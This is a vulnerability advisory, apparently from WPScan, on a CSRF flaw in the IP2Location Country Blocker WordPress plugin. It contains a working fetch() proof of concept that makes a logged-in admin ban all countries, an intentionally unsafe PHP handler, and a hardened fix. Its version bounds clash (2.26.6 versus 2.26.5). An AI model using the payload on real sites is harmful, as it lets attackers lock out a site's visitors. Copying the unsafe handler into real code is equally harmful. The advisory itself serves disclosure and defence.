wpvulndb | Krzysztof Zając | WPVDB-ID: 9D416CA3-BD02-4FCF-B3B8-F2F2280D02D2
History: Jan 06, 2022 - 12:00 a.m.

IP2Location Country Blocker < 2.26.6 - Arbitrary Country Ban via CSRF

2022-01-06 00:00:00
Krzysztof Zając
wpscan.com
10

EPSS: 0.001 (Low), Percentile: 37.9%

The plugin does not have a CSRF check in the ip2location_country_blocker_save_rules AJAX action, allowing attackers to make a logged-in admin block an arbitrary country, or all countries at once, preventing users from accessing the frontend.

PoC

Make an admin open a page with the following code in it, which will ban visitors from all countries:

    fetch("https://example.com/wp-admin/admin-ajax.php", {
        headers: { "content-type": "application/x-www-form-urlencoded" },
        body: new URLSearchParams({
            action: "ip2location_country_blocker_save_rules",
            "countries[]": "nonexistent",
            mode: 0
        }),
        method: "POST",
        credentials: "include"
    })
    .then(response => response.text())
    .then(data => { console.log(data); });
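The root cause above is a privileged admin-ajax handler that trusts the admin's session cookie alone, which the browser attaches to any cross-site POST. The following is an added example, not the plugin's code, showing the same handler pattern with and without the fix: a WordPress nonce check (check_ajax_referer), an explicit capability check, and input validation that also rejects the "nonexistent" country value used in the PoC. The handler name, option name, nonce action, script handle and the accepted "mode" values are assumptions chosen for illustration.

```php
<?php
// Added example (not the plugin's code). Names below are assumptions.

// Vulnerable pattern: reachable via admin-ajax.php by any logged-in user's
// browser, with no proof that the request came from the plugin's own page.
function example_save_rules_unsafe() {
    $countries = isset( $_POST['countries'] ) ? (array) $_POST['countries'] : array();
    $mode      = isset( $_POST['mode'] ) ? (int) $_POST['mode'] : 0;
    update_option( 'example_country_rules', array( 'countries' => $countries, 'mode' => $mode ) );
    wp_send_json_success();
}

// Hardened version of the same handler.
function example_save_rules() {
    // Rejects the request (HTTP 403, body "-1") when the nonce is missing,
    // expired, or minted for another user or action. A cross-site page cannot
    // read the nonce, so a forged request fails here.
    check_ajax_referer( 'example_save_rules', 'nonce' );

    // Do not rely on the wp_ajax_ hook alone for authorization.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // Validate input: keep only two-letter uppercase country codes, so a value
    // such as "nonexistent" cannot reach the stored rules.
    $countries = isset( $_POST['countries'] ) ? (array) wp_unslash( $_POST['countries'] ) : array();
    $countries = array_values( array_filter(
        array_map( 'sanitize_text_field', $countries ),
        function ( $code ) {
            return (bool) preg_match( '/^[A-Z]{2}$/', $code );
        }
    ) );

    // Accepted mode values (0/1) are an assumption for this example.
    $mode = isset( $_POST['mode'] ) ? (int) $_POST['mode'] : 0;
    if ( ! in_array( $mode, array( 0, 1 ), true ) ) {
        wp_send_json_error( 'invalid mode', 400 );
    }

    update_option( 'example_country_rules', array( 'countries' => $countries, 'mode' => $mode ) );
    wp_send_json_success();
}
add_action( 'wp_ajax_example_save_rules', 'example_save_rules' );

// Hand the nonce to the plugin's own settings-page script, which sends it
// as the "nonce" POST field alongside "action", "countries[]" and "mode".
function example_enqueue_admin_script( $hook ) {
    if ( 'settings_page_example' !== $hook ) {
        return;
    }
    wp_enqueue_script( 'example-admin', plugins_url( 'admin.js', __FILE__ ), array(), '1.0', true );
    wp_localize_script( 'example-admin', 'exampleAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'example_save_rules' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'example_enqueue_admin_script' );
```

When reviewing a plugin for this class of issue, check every wp_ajax_ callback that writes options for a check_ajax_referer or wp_verify_nonce call paired with a current_user_can check; the nonce proves the request originated from the site's own page, and the capability check proves the user is allowed to make the change.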

CPE Name                    | Operator | Version
ip2location-country-blocker | lt       | 2.26.5

